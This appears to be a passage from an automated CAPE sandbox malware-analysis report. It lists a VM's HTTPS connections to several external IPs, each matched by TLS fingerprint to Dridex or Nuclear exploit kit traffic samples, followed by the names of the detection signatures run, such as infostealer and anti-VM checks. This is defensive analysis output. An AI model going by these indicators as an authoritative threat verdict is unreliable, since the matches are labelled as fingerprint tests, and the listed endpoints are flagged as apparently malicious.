eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49325 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49326 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49327 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49328 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49329 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49331 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49332 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49333 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49334 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49336 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49337 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49338 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49339 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49340 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49342 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49343 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49344 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49345 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49369 198.54.115.33 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49395 198.54.115.33 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49362 198.54.125.57 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49390 198.54.125.57 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49373 68.65.122.52 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49206 72.21.81.200 iecvlist.microsoft.com 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49207 72.21.81.200 iecvlist.microsoft.com 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Processing ( 5.813 seconds )

  • 2.949 CAPE
  • 2.857 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.001 BehaviorAnalysis
  • 0.001 Debug

Signatures ( 0.052 seconds )

  • 0.008 ransomware_files
  • 0.007 antiav_detectreg
  • 0.005 recon_checkip
  • 0.003 antiav_detectfile
  • 0.003 infostealer_ftp
  • 0.003 ransomware_extensions
  • 0.002 persistence_autorun
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_im
  • 0.002 network_doh
  • 0.002 network_torgateway
  • 0.001 tinba_behavior
  • 0.001 rat_nanocore
  • 0.001 cerber_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antianalysis_detectreg
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 disables_browser_warn
  • 0.001 infostealer_mail
  • 0.001 ie_martian_children

Reporting ( 0.0 seconds )

Task ID 94107
Mongo ID 5d9c44412896bfeded6fac23
Cuckoo release 1.3-CAPE